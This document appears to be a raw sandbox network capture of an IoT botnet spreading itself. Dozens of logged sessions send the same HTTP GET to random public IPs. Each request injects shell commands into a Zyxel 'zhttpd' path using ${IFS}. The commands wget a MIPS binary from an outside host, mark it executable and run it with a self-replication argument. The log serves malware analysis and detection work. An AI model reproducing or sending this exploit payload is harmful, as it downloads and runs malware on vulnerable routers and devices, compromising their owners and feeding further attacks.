                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581449032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3798192.168.2.144299860.119.223.210443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581480026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3799192.168.2.145739620.39.82.70443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581505060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3800192.168.2.14474488.6.155.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581558943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3801192.168.2.1452196175.114.45.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581588984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3802192.168.2.145897654.144.137.96443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581643105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3803192.168.2.1449420212.7.96.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581666946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3804192.168.2.1443962216.5.79.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581713915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3805192.168.2.144802674.19.213.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581753969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3806192.168.2.145666695.9.11.36443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581810951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3807192.168.2.1452832133.192.136.31443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581846952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3808192.168.2.14332828.114.220.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581881046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3809192.168.2.1441356117.148.72.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.581907988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3810192.168.2.1444034142.72.247.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582036018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3811192.168.2.144614285.24.119.104443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582078934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3812192.168.2.1436156106.79.155.193443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582098007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3813192.168.2.1433236208.210.30.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582142115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3814192.168.2.145629059.236.27.23443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582200050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3815192.168.2.1444286210.4.125.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582243919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3816192.168.2.1456158207.150.28.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582271099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3817192.168.2.1459748220.158.77.79443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582300901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3818192.168.2.1444266211.18.77.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582354069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3819192.168.2.143958257.118.159.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582382917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3820192.168.2.1448788175.66.23.21443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582448959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3821192.168.2.1453054135.211.30.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582494974 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3822192.168.2.1446460124.158.9.123443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582509041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3823192.168.2.1436528109.24.51.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582568884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3824192.168.2.1435152122.186.80.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582592010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3825192.168.2.14601742.25.115.226443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582612991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3826192.168.2.1433862164.77.201.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582659006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3827192.168.2.144658289.248.25.143443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582705021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3828192.168.2.144341666.2.105.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582730055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3829192.168.2.14551102.173.63.144443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582760096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3830192.168.2.1438532157.98.66.16443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582798958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3831192.168.2.1443184208.3.135.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582828045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3832192.168.2.1440858112.143.249.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582887888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3833192.168.2.145741073.12.182.44443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582931042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3834192.168.2.1435666148.122.52.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.582961082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3835192.168.2.143864414.210.174.247443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583014965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3836192.168.2.1456822164.179.144.92443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583035946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3837192.168.2.1435354155.117.132.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583087921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3838192.168.2.1445916209.161.117.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583131075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3839192.168.2.1436376193.210.201.113443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583158970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3840192.168.2.145555617.31.39.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583194971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3841192.168.2.1443092179.163.128.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583247900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3842192.168.2.144431427.89.24.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583276987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3843192.168.2.1455692172.71.207.181443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583312988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3844192.168.2.1449658119.59.35.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583353996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3845192.168.2.1445242176.49.178.208443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583391905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3846192.168.2.145933250.149.115.189443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583421946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3847192.168.2.1443002221.238.64.30443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583453894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3848192.168.2.145031883.9.26.135443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583488941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3849192.168.2.1459940117.172.167.8443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583538055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3850192.168.2.1451392171.155.73.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583599091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3851192.168.2.1449466147.219.54.69443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583633900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3852192.168.2.145806627.179.192.105443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583658934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3853192.168.2.145963436.69.172.151443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583712101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3854192.168.2.144071896.113.87.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583770990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3855192.168.2.1447114161.92.176.84443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583810091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3856192.168.2.1437398136.46.186.71443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583853960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3857192.168.2.145287248.139.90.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583884954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3858192.168.2.144347670.72.59.248443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583919048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3859192.168.2.1441848153.226.60.254443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:50.583972931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3860192.168.2.14432205.211.133.247443
                                                      TimestampBytes transferredDirectionData
